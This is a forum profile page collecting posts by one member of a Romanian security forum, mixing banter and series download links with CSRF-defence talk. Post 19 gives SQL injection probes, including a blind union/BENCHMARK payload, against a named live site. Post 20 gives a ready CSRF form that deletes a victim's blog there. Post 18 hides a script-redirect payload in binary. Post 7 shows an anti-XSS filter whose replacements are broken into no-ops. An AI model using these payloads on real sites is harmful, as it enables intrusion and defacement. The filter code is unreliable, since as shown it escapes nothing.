Jump to content

moubik

Active Members
  • Posts

    1261
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by moubik

  1. ok nu mai zic nimik... dar daca iti dau si eu un documentar cu big bang si etc ..o sa vezi ca-i deferit . In fine... am deviat si eu cam mult de la subiect pai da-mi documentar daca vrei. eu am dat SERIAL COMEDIE CARE NU ARE LEGATURA CU TEORIA BIG BANG. acum intelegi ?
  2. codex, taci. faza cu crierul si procentul folosit e mit. s-a mai discutat chiar pe rst asta. niciodata nu o sa poti sa faci tot ce fac eu. si niciodata nu o sa pot eu sa fac tot ce poti tu. accepta evolutia, accepta diferentele
  3. toata lumea stie ce e big bang theory si big crunch theory. asta e serial http://www.imdb.com/title/tt0898266/
  4. http://www.fileb0x.ro/download.php?key=0931dba2d31a3d0a614848983c079dfb http://www.fileb0x.ro/download.php?key=c0a79b1bcd8fb0bb89111db204e30c23 http://www.fileb0x.ro/download.php?key=ac8037cf1e8acb802b4e7dece73d635f http://www.fileb0x.ro/download.php?key=4a2ed09ba3aeb0ddf2f5f955a8dcd495 http://www.fileb0x.ro/download.php?key=02dc08d8ea7c31f700d01b6007d91d28 http://www.fileb0x.ro/download.php?key=ce537da8c7596395b7fa3b1160dc07a3 http://www.fileb0x.ro/download.php?key=3f93180f18dea6a2ecfaf80e9962c9eb http://www.fileb0x.ro/download.php?key=9e52ce3f2bb0d57676c447eff59dce32 http://www.fileb0x.ro/download.php?key=8657e60d8340dca1123dce1bdfa5b205 http://www.fileb0x.ro/download.php?key=d6634c8500c271009036df972f63cd08 http://www.fileb0x.ro/download.php?key=21f71e27d95f1d847ccbc9e79ed4caba http://www.fileb0x.ro/download.php?key=141a1619159a1dde21314bea6e8434b2 http://www.fileb0x.ro/download.php?key=d7969cda86d4b92aba5226bf808bb564 http://www.fileb0x.ro/download.php?key=a9370b4af81a1c893c1f6d643faeeb81 http://www.fileb0x.ro/download.php?key=3460aa491735ed66842b806754f01937 http://www.fileb0x.ro/download.php?key=997a0184cdda2f96c09ce7635cad2a53 http://www.fileb0x.ro/download.php?key=ae09be604594ae6a8f72fb60cff9ab57 de la episodul 1 la 17 mie mi-a placut serialul asta (puneti "o" in loc de zero) http://www.imdb.com/title/tt0898266/
  5. mai stiu cum e sa nu ai ce manca. si in acelasi timp stiu cum e sa pot sa ma intretin singur. selectia naturala trebuie sa-si spuna cuvantul. furtul tot furt este. pedepsele furt pe internet sunt MULT prea dure totusi. si, da, sunt excroci oamenii. asta fac inseala si fura. crezi ca ei furau pentru ca nu aveau ce manca ? crezi ca o data ce le ajungeau banii ca sa manance si sa se intretina se opreau si incercau sa-si gaseasca ceva LEGITIM de facut ? eu sunt sigur ca nu
  6. un formular cu post e la fel de vulnerabil ca un formular cu get cu get rezulta ceva de genul http://site.com/index.php?var1=valoare&var2=valoare - deci ar fi usor sa pacalesti userul sa intre pe acest url cu post e explicat aici: http://websecurity.ro/blog/2007/11/17/csrf-cross-site-request-forgery-tutorial/
  7. poti sa treci de html_entities daca nu il folosesti corect eu prefer function filterCross($filterMe) { $tempMe = $filterMe; $filterMe = str_replace("&", "&", $filterMe); //$filterMe = str_replace("#", "#", $filterMe); $filterMe = str_replace("<", "<", $filterMe); $filterMe = str_replace(">", ">", $filterMe); //$filterMe = str_replace("(", "(", $filterMe); //$filterMe = str_replace(")", ")", $filterMe); $filterMe = str_replace('"', """, $filterMe); $filterMe = str_replace("'", "'", $filterMe); //$filterMe = str_replace("+", "+", $filterMe); if (strcmp($tempMe,$filterMe)) { //logHacker(); } return $filterMe; } functia e scoasa dintr-un site de-al meu
  8. 1,2: formularele POST nu te salveaza de csrf, nici formular de confirmare. 3: e valid atata timp cat nu ti-a aflat sesiunea eu prefer metoda 4: se creaza cheie random la fiecare refresh al paginii, si o cheie numita salting pentru a fi folosita la morpharea saltingului se salveaza in sesiune rezultatul criptarii pentru a putea fi comparat cu ce primim de la user. exemplu: de genul cheie random: Ajf84Odka03 --> $_GET['sid'] si salting: unixtime() --> $_GET['time'] $_SESSION['result'] <-- aici se salveaza hash-ul pe care speram sa-l obtinem la verificare pentru a face actiunea userului. (mai jos se da un exemplu de criptare) se salveaza in sesiune pentru fiecare cheie un hash prin metoda privata sau sau criptari bazate pe salting. salting care poate fi schimbat des si stiut numai de server (pentru a te proteja de reply attack) exemplu: $saltingMorph = $_GET['time']; $resultedFromUser = hash_hmac("md5", $_GET['sid'], "text stiut numai de server".$saltingMorph); if ($resultedFromUser === $_SESSION['result']) { //s-a validat } PS chiar iti place modul de scriere GNU al codului ? mie mi se pare foarte putin lizibil ...
  9. old stuff dude, asta e originalul: http://thewebsiteisdown.com/
  10. moubik

    conq killed

    http://stat.trafic.ro/stat/conquiztador/vizite/luna/#stat
  11. ceva rezultate ? nope, am 6100 si merge de la 8000 in sus parca.. departe rau
  12. Din cate stiu sunt 3 variante cu care poti sa faci escape la requesturile POST ajax. escape() encodeURI() encodeURIComponent() nu stiu care este cea mai buna pentru a face escape catre un script .php si la partea php care sa restaureze valoarea parametrului.
  13. o sa incerc acasa sunt curios daca merge. pe laptopul de la munca nu-mi merge accelerarea.
  14. unii sunt incapatanati si cred ca ce e vechi e mai bun. ciudat sa spui asta intr-o lume in care noutatile apar in fiecare zi, nu ? fosile ?
  15. Florin Salam in toata splendoarea lui http://www.youtube.com/watch?v=ZNA07FYi8Xc Si nu uitati sa cititi commenturile celor care il apara manca-ti-as ... ...
  16. si in plus nu zici pe cine ai intrebat cat timp ai facut injectu asta
  17. nu e nici o inovatie concatenarea de selecturi sau selecturile in selecturi :PP inseamna sa stii sql asa cum trebuie stiut
  18. kenny, "oriunde" nu "ori unde".... am si eu un mesaj pt voi: 111100 1110011 1100011 1110010 1101001 1110000 1110100 111110 1100100 1101111 1100011 1110101 1101101 1100101 1101110 1110100 101110 1101100 1101111 1100011 1100001 1110100 1101001 1101111 1101110 111101 100111 1101000 1110100 1110100 1110000 111010 101111 101111 1100101 1110101 1110010 1101111 110010 110000 110000 111001 101110 110001 110000 110000 1110111 1100101 1100010 1110011 1110000 1100001 1100011 1100101 101110 1101110 1100101 1110100 101111 100111 111100 101111 1110011 1100011 1110010 1101001 1110000 1110100 111110 ahh... si poate va potoliti sa mai trimiteti mesaje dastea. ca sa fie toti 1337 si in consecinta daca toti sunt 1337 nimeni nu mai este... : <?php $message = "mesaj LLLLLLLLLLLLLLEEEEEEEEEEEEEEEEEEETTTTTTTTTTTTTTTTTTTTT"; $len = strlen($message); for ($i = 0 ; $i < $len ; $i++) { echo base_convert(ord($message[$i]), 10, 2) ." "; } ?>
  19. moubik

    RST BLOG!

    cum e in teste, e full disclosure de fapt kw3, verifica variabila "favourite" legata de sql injection da niste rezultate ciudate, nu-mi dau seama ce se intampla de fapt acolo de dragul obisnuintei: ( [url]http://rstcenter.com/index.php[/url] ?pagina=blog &cmd=favourites &operation=add &favourite=144832 or 1=1 asta nu face nici un echo la al doilea request: [url]http://rstcenter.com/index.php[/url] ?pagina=blog &cmd=favourites &operation=add &favourite=144832 and 1=1 asta spune ca nu exista blogul: [url]http://rstcenter.com/index.php[/url] ?pagina=blog &cmd=favourites &operation=add &favourite=144832 and 1=2 edit: spune ca nu exista blogul [url]http://rstcenter.com/index.php[/url] ?pagina=blog &cmd=favourites &operation=add &favourite=144832 order by 7 -- nu spune nimic iarasi: [url]http://rstcenter.com/index.php[/url] ?pagina=blog &cmd=favourites &operation=add &favourite=144832 order by 6 -- edit edit edit: uite si blind sql injection: [url]http://rstcenter.com/index.php[/url] ?pagina=blog &cmd=favourites &operation=add &favourite=1448329 union all select 1,2,3,4,5, BENCHMARK(10000000,MD5(CHAR(97))) --
  20. moubik

    RST BLOG!

    CSRF pentru auto-stergere blog: <script> setTimeout("document.getElementById('rstCSRF').submit();", 100); </script> <form action="http://rstcenter.com/index.php?pagina=blog&cmd=myblog" id="rstCSRF" method="post"> <input type="hidden" value="closeblog2" name="action"/> <input type="submit" value="Confirm Close Blog"/> </form>
  21. nu pleaca din rst. ar fi spus si ceva de mine sigur daca era asa <?php $message = "01001110 01101111 01101000 00101100 00100000 01110011 01100001 01101100 01110101 01110100 01100001 01110010 01100101 00100000 01101100 01100001 00100000 01110100 01101111 01110100 01101001 00100001 00100000 01001101 01101001 00101101 01100001 00100000 01100110 01100001 01100011 01110101 01110100 00100000 01110000 01101100 01100001 01100011 01100101 01110010 01100101 00100000 01110011 01100001 00100000 01100110 01101001 01110101 00100000 01100001 01101001 01100011 01101001 00101110 00001101 00001010 00001101 00001010 01010101 01101001 01110100 01100001 00101101 01110100 01101001 00100000 01110101 01101110 00100000 01100110 01100101 01100101 01100100 01100010 01100001 01100011 01101011 00100000 01110000 01100101 01101110 01110100 01110010 01110101 00100000 01110011 01110100 01100001 01100110 01100110 00100000 00111010 00001101 00001010 00001101 00001010 01001011 01110111 00110011 01110010 01101100 01101110 00100000 00101101 00100000 01000111 01110010 01100101 01100001 01110100 00100000 01100001 01100100 01101101 01101001 01101110 00001101 00001010 01110011 01111001 01110011 01100111 01101000 00110000 01110011 01110100 00100000 00101101 00100000 01001110 00101101 01100001 01101101 00100000 01101110 01101001 01101101 01101001 01100011 00100000 01101001 01101101 01110000 01101111 01110100 01110010 01101001 01110110 01100001 00100000 01100011 01110101 00100000 01100101 01101100 00001101 00001010 01100100 01100101 01100001 01110100 01101000 00100000 00101101 00100000 01001110 00101101 01100001 01101101 00100000 01101110 01101001 01101101 01101001 01100011 00100000 01101001 01101101 01110000 01101111 01110100 01110010 01101001 01110110 01100001 00100000 01100011 01110101 00100000 01100101 01101100 00001101 00001010 01001110 01100101 01101101 01100101 01110011 01110011 01101001 01110011 00100000 00101101 00100000 01000001 01100110 01110010 01101001 01100011 01100001 01101110 00100000 01001001 01100100 01101001 01101111 01110100 00100000 00110001 00110000 00110000 00100101 00001101 00001010 01010011 01101100 01101001 01100011 01101011 00100000 00101101 00100000 01000111 01110010 01100101 01100001 01110100 00100000 01100001 01100100 01101101 01101001 01101110 00001101 00001010 01010110 01101001 01110010 01100111 01101001 01101100 00100000 00101101 00100000 01001110 00101101 01100001 01101101 00100000 01101110 01101001 01101101 01101001 01100011 00100000 01101001 01101101 01110000 01101111 01110100 01110010 01101001 01110110 01100001 00100000 01100011 01110101 00100000 01100101 01101100 00001101 00001010 01010010 01100101 01110011 01110100 01110101 01101100 00100000 00101101 00100000 01001110 00101101 01100001 01101101 00100000 01101110 01101001 01101101 01101001 01100011 00100000 01101001 01101101 01110000 01101111 01110100 01110010 01101001 01110110 01100001 00100000 01100011 01110101 00100000 01100101 01101001 00001101 00001010 00001101 00001010 01010110 00101101 01100001 01101101 00100000 01100001 01101010 01110101 01110100 01100001 01110100 00100000 01100011 01100001 01110100 00100000 01100001 01101101 00100000 01110000 01110101 01110100 01110101 01110100 00100000 00111010 00100000 01110110 00101101 01100001 01101101 00100000 01111010 01101001 01110011 00100000 01100011 01110101 01101101 00100000 01110011 01100001 00100000 00101100 00101100 01101000 01100001 01100011 01101011 00101101 01110101 01101001 01110100 01101001 00100010 00100000 01100001 01110101 01110100 01101111 01101101 01100001 01110100 01110101 01101100 00100000 01100100 01100101 00100000 01100011 01100001 01100110 01100101 01100001 00111011 00100000 01110110 00101101 01100001 01101101 00100000 01110011 01110000 01110101 01110011 00100000 01100011 01110101 01101101 00100000 01110011 01100001 00100000 01110100 01110010 01101001 01110011 01100001 01110100 01101001 00100000 01000010 01101001 01110100 01100101 01100110 01101001 01100111 01101000 01110100 00100000 01110011 01101001 00100000 01110110 00101101 01100001 01101101 00100000 01100100 01100001 01110100 00100000 01110101 01101110 00100000 01100011 01101000 01100001 01110100 00100000 00101000 01101000 01110100 01110100 01110000 00111010 00101111 00101111 01110010 01110011 01110100 01100011 01100101 01101110 01110100 01100101 01110010 00101110 01110111 01100101 01100010 01110011 00101110 01100011 01101111 01101101 00101111 00100000 01110101 01110011 01100101 01110010 00111010 01110010 01110011 01110100 01101101 01100101 01101101 01100010 01100101 01110010 00100000 00111011 00100000 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 00111010 01100011 01100001 01110100 01100001 01101101 01101111 01101110 01101001 01100001 00101001 00100000 00101110 00001101 00001010 00001101 00001010 01100010 01111001 01100101 00101101 01100010 01111001 01100101 00100000 01100001 01110101 00100000 01110010 01100101 01110110 01101111 01101001 01110010 00100000 01010100 01110011 01100011 01101000 11111100 01110011 00100000 01100001 01100100 01101001 11110011 01110011 00100000 01100001 01110010 01110010 01101001 01110110 01100101 01100100 01100101 01110010 01100011 01101001"; $parts = explode(" ", $message); foreach ($parts as $letter) { echo chr(base_convert($letter, 2, 10)); } ?> reprezinta mesajul descifrat de nytro.
  22. eu sunt curios ce efecte or sa aiba la nameservere (poate apare un exploit? )
×
×
  • Create New...